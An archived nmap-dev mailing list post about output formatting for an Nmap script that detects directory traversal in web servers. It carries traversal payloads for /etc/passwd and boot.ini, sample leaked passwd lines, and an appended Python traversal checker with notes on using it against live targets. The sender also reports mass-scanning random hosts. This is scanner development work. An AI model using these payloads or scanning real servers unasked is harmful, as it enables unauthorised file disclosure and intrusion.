Nmap Development mailing list archives

Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)


From: Gutek <ange.gutek () gmail com>
Date: Sun, 20 Jun 2010 08:52:12 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Just a small change (proposal) to keep the output clean.
The output now depends on verbosity.

When -v < 1:
PORT   STATE SERVICE
80/tcp open  http
| http-passwd: Directory Traversal Found.
|_Payload: "../../../../../../../../../../etc/passwd"

When -v > 1:
PORT   STATE SERVICE
80/tcp open  http
| http-passwd: Directory Traversal Found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

BTW and for the record, after running -iR against tons of webservers to
test the script, I've noticed that the probability of finding a
vulnerable one is about 1 per 50000 (0.002%).
Two thirds are Windows boxes, revealed by the 'boot.ini' payloads, and one
third are *nix ones. Among those last ones, many are Dreamboxes (see
http://en.wikipedia.org/wiki/Dreambox ).

A.G.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkwdupwACgkQ3aDTTO0ha7gprACeJKJNLt09nLdZCNssMyIA/kQP
P9IAmwUN8PGr8miuotbB0mh7L2McNE99
=llg/
-----END PGP SIGNATURE-----

Attachment: http-passwd.nse
Description:
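
The detection and verbosity logic the message describes, as an added example written for this page in Python. It is not the attached http-passwd.nse script (NSE scripts are Lua) or any other Nmap code. The /etc/passwd payload and the sample passwd lines are taken from the output above; the exact boot.ini path, the content markers used to recognise each file, the `fetch(path) -> (status, body)` callback and the three stand-in "servers" are assumptions constructed for the example. The point a practitioner should take from it: a 200 status is not evidence of traversal, since many servers answer every path with a 200 "soft 404" page, so the body has to be checked against a marker of the file that was asked for before reporting a finding.

```python
import re

# Traversal payloads. The /etc/passwd one is quoted in the message above; the
# boot.ini path is an assumption (the message only names the file).
PAYLOADS = {
    "unix": "../../../../../../../../../../etc/passwd",
    "windows": "../../../../../../../../../../boot.ini",
}

# Content markers (assumed for this example): a real /etc/passwd starts with
# the root entry at uid/gid 0, a real boot.ini starts with "[boot loader]".
MARKERS = {
    "unix": re.compile(r"^root:[^:]*:0:0:", re.MULTILINE),
    "windows": re.compile(r"^\[boot loader\]", re.MULTILINE | re.IGNORECASE),
}


def classify(body):
    """Return 'unix', 'windows' or None depending on which file the body resembles."""
    for kind, marker in MARKERS.items():
        if marker.search(body):
            return kind
    return None


def check_traversal(fetch):
    """fetch(path) -> (status, body). Returns (payload, kind, body) for the first
    payload whose 200 response actually looks like the requested file, else None."""
    for kind, payload in PAYLOADS.items():
        status, body = fetch(payload)
        if status != 200:
            continue
        if classify(body) == kind:
            return payload, kind, body
    return None


def format_output(result, verbosity, limit=250):
    """Mimic the verbosity-dependent output proposed in the message: payload only
    at low verbosity, payload plus the first `limit` bytes of the body above it."""
    payload, _kind, body = result
    lines = ["http-passwd: Directory Traversal Found.", 'Payload: "%s"' % payload]
    if verbosity > 1:
        lines.append("Printing first %d bytes:" % limit)
        lines.extend(body[:limit].splitlines())
    return "\n".join(lines)


# --- constructed responses standing in for real web servers ---

# Sample passwd lines as shown in the message output above.
PASSWD_BODY = ("root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh\n"
               "sshd:*:65532:65534::/:/bin/false\n"
               "ftp:*:65533:65534::/:/bin/false\n"
               "nobody:*:65534:65534::/:/bin/false\n")
# Constructed boot.ini content for the example.
BOOTINI_BODY = ("[boot loader]\r\ntimeout=30\r\n"
                "default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\r\n")
# Constructed "soft 404": a server that returns 200 and a generic page for any path.
SOFT404_BODY = "<html><body><h1>Welcome</h1><p>Page not found.</p></body></html>"


def vulnerable_unix_fetch(path):
    return (200, PASSWD_BODY) if path.endswith("/etc/passwd") else (404, "")


def vulnerable_windows_fetch(path):
    return (200, BOOTINI_BODY) if path.endswith("boot.ini") else (404, "")


def soft404_fetch(path):
    # A status-only check would report this host as vulnerable; the marker check does not.
    return (200, SOFT404_BODY)


if __name__ == "__main__":
    for name, fetch in [("unix", vulnerable_unix_fetch),
                        ("windows", vulnerable_windows_fetch),
                        ("soft404", soft404_fetch)]:
        result = check_traversal(fetch)
        print("== %s ==" % name)
        print(format_output(result, verbosity=2) if result else "no traversal found")
```

To use it against a live target, replace the stand-in `fetch` functions with one that performs the HTTP request and returns the status code and body; the marker check is what keeps the soft-404 hosts, which are common when scanning random addresses with -iR, out of the results.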

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
